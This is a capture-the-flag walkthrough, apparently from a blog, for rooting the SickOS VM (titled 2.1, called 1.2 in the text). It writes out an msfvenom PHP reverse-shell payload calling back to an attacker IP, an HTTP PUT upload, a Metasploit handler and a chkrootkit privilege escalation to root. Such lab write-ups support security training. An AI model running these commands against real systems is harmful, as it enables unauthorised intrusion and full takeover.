Chuyển đến nội dung chính

Hack the SickOS 2.1 VM (CTF Challenge)

In this walk through I will explain how to solve the SickOs 1.2 challenge. This OS is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.
First Download Sick OS from Here
So, first let us find our target by using :
netdiscover
Our target is 192.168.1.105 Further we will apply nmap scan :
nmap -A -p- 192.168.1.105

As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?

Opening the IP in the browser will show us the above image which is of no use. You can try and look into the page source but unfortunately you will find nothing there. That is why we will use dirb and to find the directories. And for that type :
dirb http://192.168.1.105
As a result you can see we have found our directory i.e. test Open it in the browser as well.
192.168.1.105/test/

It will show you the list of directories. So let us try and explore test directory via curl.
curl -v -X OPTIONS http://192.168.1.105/test

This exploring will show you that PUT is allowed that means you can upload through it.
So, prepare the malicious file that you would upload with msfvenom :
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension.
Now to upload your .php file we will use the add-on poster.
Click on the tools from the menu bar. And then click on Poster from the drop down menu.

A following dialog box will open. Here, browse the file that you will upload and click on PUT option.

It will show you that the file is uploaded.

And you can see the same on your browser that you file will be uploaded (as in our case the file is shell.php)
Simultaneously, open metasploit and use multi/handler :
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit
After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session. Go to shell typing :
shell
Now we need to import the python file to reach the terminal and to do so type :
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now there might the kernel version that we could exploit so to check its version type ;
lsb_release -a
As you can see that version is not exploitable so we will leave it alone.
Moving further type the following to explore more and find something to be exploitable :
ls -l /etc/cron.daily

The above command will give you the list of the files. On observing you can see that there is chkrootkit. Some of its version are exploitable therefore we will check its version and for that type :
chkrootkit -V
It will show you the version which is 0.49
We will now search for its exploit in the terminal of Kali by typing :
searchsploit chkrootkit
Hence, the exploits.
Now open metasploit and check the already opened session first and then look for the exploit by typing :
search chkrootkit
And the exploit which you have to use will appear. And to use this exploit type :
Then further type options so that you will know what options you are supposed to set. Checking the options you know you only need to assign he session and lport so type :
use exploit/unix/local/chkrootkit
set session 1
set lport 8080
exploit
Now check whether you have gained another session or not and for that type :
sessions
And as you can see you will surely have one more session and so to open that session type :
sessions -i 2
As you open the session check what user you are in and for that type :
whoami
It will show you that you are in root so further type :
cd /root
And to see the list of files in /root type :
ls -lsa
In the list you will see that there is a text file and to read that file type :
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm